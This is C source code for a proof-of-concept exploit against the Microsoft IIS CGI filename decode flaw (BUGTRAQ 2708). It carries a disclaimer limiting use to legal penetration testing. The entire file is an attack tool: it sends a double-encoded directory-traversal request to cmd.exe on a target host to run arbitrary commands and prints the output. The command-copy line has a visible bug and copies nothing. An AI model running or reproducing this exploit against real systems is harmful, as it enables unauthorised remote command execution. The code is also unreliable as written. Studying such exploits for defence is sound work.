/*
*
* execiis.c - (c)copyright Filip Maertens
* BUGTRAQ ID: 2708 - Microsoft IIS CGI Filename Decode Error
*
* DISCLAIMER: This is proof of concept code. This means, this code
* may only be used on approved systems in order to test the availability
* and integrity of machines during a legal penetration test. In no way
* is the author of this exploit responsible for the use and result of
* this code.
*
*/
/* Might as well port this one too.
* vacuum@technotronic.com
*/
#include <stdio.h>
#include <stdlib.h>
#ifdef WIN32
#pragma comment (lib,"Ws2_32")
#include <windows.h>
#include <winsock.h>
#define close closesocket
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#endif
#include <sys/types.h>
#include <string.h>
int main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *ht;
char recvbuffer[1];
int create_socket;
#ifdef WIN32
WSADATA WSAData;
#endif
char request[8192]="GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
char cmd[1024]="";
printf("iisexec.c | Microsoft IIS CGI Filename Decode Error |\n");
printf("<filip@securax.be>\n");
if (argc < 3)
{
printf(" -- Usage: iisexec [hostname] [command]\n");
exit(-1);
}
#ifdef WIN32
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) {
printf("WSAStartup failed.\n");
WSACleanup();
exit(-1);
}
#endif
if ((ht = gethostbyname(argv[1])) == 0)
{
#ifndef WIN32
herror(argv[1]);
#else
fprintf(stderr, "Unable to resolve host %s\n",argv[1]);
#endif
exit(-1);
}
else
memcpy(&sin.sin_addr, ht->h_addr_list[0], sizeof(sin.sin_addr));
if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
printf(" -- Socket created.\n");
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
printf(" -- Connection made.\n");
else
{
printf(" -- No connection.\n");
exit(1);
}
/* Modify this value to whichever sequence you want.
*
* %255c = %%35c = %%35%63 = %25%35%63 = /
*
*/
strncpy(cmd, argv[2], strlen(cmd));
strncpy(request,
"GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+",
sizeof(request));
strncat(request, cmd, sizeof(request) - strlen(request));
strncat(request, "\n", sizeof(request) - strlen(request));
memset(recvbuffer, '\0',sizeof(recvbuffer));
printf("[%s]\n",request);
send(create_socket, request, sizeof(request), 0);
recv(create_socket, recvbuffer, sizeof (recvbuffer),0);
if ( ( strstr(recvbuffer,"404") == NULL ) )
{
printf(" -- Command output:\n\n");
while(recv(create_socket, recvbuffer, 1, 0) > 0)
{
printf("%c", recvbuffer[0]);
}
}
else
printf(" -- Wrong command processing. \n");
close(create_socket);
exit(0);
}
Credits
-- UnKnown --
|